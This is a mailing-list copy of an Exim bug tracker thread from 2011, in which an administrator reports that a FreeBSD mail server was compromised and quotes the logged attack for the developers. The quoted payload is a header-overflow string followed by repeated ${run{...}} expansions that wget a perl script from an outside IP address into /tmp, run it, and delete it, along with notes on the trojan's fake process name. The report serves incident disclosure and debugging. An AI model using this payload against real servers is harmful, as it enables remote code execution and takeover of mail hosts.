[exim-dev] [Bug 1135] posible vulnerability same buffer over…

Top Page
Delete this message
Reply to this message
Author: Adrian P
Date:  
To: exim-dev
Subject: [exim-dev] [Bug 1135] posible vulnerability same buffer overflow exploit
------- You are receiving this mail because: -------
You are on the CC list for the bug.

http://bugs.exim.org/show_bug.cgi?id=1135




--- Comment #8 from Adrian P <adi@???> 2011-08-12 19:38:42 ---
this was / is the default config which is a modified copy of
configure.default coming with exim
exim installed from ports
# $FreeBSD: ports/mail/exim/Makefile,v 1.259 2011/05/11 11:30:17 rea Exp $

the machine was just cleaned up after ( as in kill all the exim and
perl processes , the trojan was a perl payload ( my @fakeps =
("/usr/sbin/exim4 -bd -q1h"); )
exim was rebuild using the latest version from freebsd ports
because the system wasn't reinstalled after i can't be 100% sure it
was clean
but the 2nd time is was the same modus operandi : perl script running
as mailnull with fake ps and

basically this payload ( this was used on 4.69 and was logged by exim)


Header0054:
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
Header0055: VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
HeaderX: ${run{/bin/sh -c 'killall -9 perl;wget 85.25.130.19/gods.txt
-O /tmp/g.x;perl /tmp/g.x;rm -f /tmp/g.x*'}}${run{/bin/sh -c 'killall -9
perl;wget 85.25.130
.19/gods.txt -O /tmp/g.x;perl /tmp/g.x;rm -f /tmp/g.x*'}}${run{/bin/sh
-c 'killall -9 perl;wget 85.25.130.19/gods.txt -O /tmp/g.x;perl
/tmp/g.x;rm -f /tmp/g.x*'}}${
run{/bin/sh -c 'killall -9 perl;wget 85.25.130.19/gods.txt -O
/tmp/g.x;perl /tmp/g.x;rm -f /tmp/g.x*'}}${run{/bin/sh -c 'killall -9
perl;wget 85.25.130.19/gods.txt
-O /tmp/g.x;perl /tmp/g.x;rm -f /tmp/g.x*'}}${run{/bin/sh -c 'killall -9
perl;wget 85.25.130.19/gods.txt -O /tmp/g.x;perl /tmp/g.x;rm -f
/tmp/g.x*'}}${run{/bin/sh -
c 'killall -9 perl;wget 85.25.130.19/gods.txt -O /tmp/g.x;perl /tmp/g.x;r


tmp/g.x*'}}${run{
*** truncated ***
2011-07-21 06:14:54 SMTP protocol synchronization error (next input sent
too soon: pipelining was advertised): rejected "Header0000:
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV"
H=42.d.5446.static.theplanet.com (yougotpwned.com) [70.84.13.66]
next input="Header0001:
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV\nHeader000"
2011-07-21 06:46:26 SMTP protocol synchronization error (input sent
without waiting for greeting): rejected connection from
H=[208.57.239.52] input="GET / HTTP/1.1\
r\nAccept: */*\r\nAccept-Language: en-us\r\nAccept-Encoding: gzip,
deflate\r\nUser-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like
Mac "   --    // looks  like msf running on  iphone



just in case i will leave that machine acting as a honey pot ( the OS
was rebuild yesterday) but with the same version of exim and config


On 11-08-12 11:28 AM, Graeme Fowler wrote:
> ------- You are receiving this mail because: -------
> You reported the bug.
>
> http://bugs.exim.org/show_bug.cgi?id=1135
>
>
>
>
> --- Comment #7 from Graeme Fowler <graeme@???> 2011-08-12 16:28:00 ---
> (In reply to comment #6)
>> that was the config at the time
> What was, the default config?
>
> If so - was that the stock default config from the distribution, a default
> config supplied by the FreeBSD ports collection, a packaged default config from
> somewhere else?
>
> Please add it as an attachment to this bug. If it's irrelevant, at least we'll
> have proved that it is but until then it may have some relevance.
>
> I might also add - did you rebuild the machine in the first place after it got
> hacked, or do some sort of "clearup" operation? Are you absolutely sure that it
> got completely secured?
>
>



--
Configure bugmail: http://bugs.exim.org/userprefs.cgi?tab=email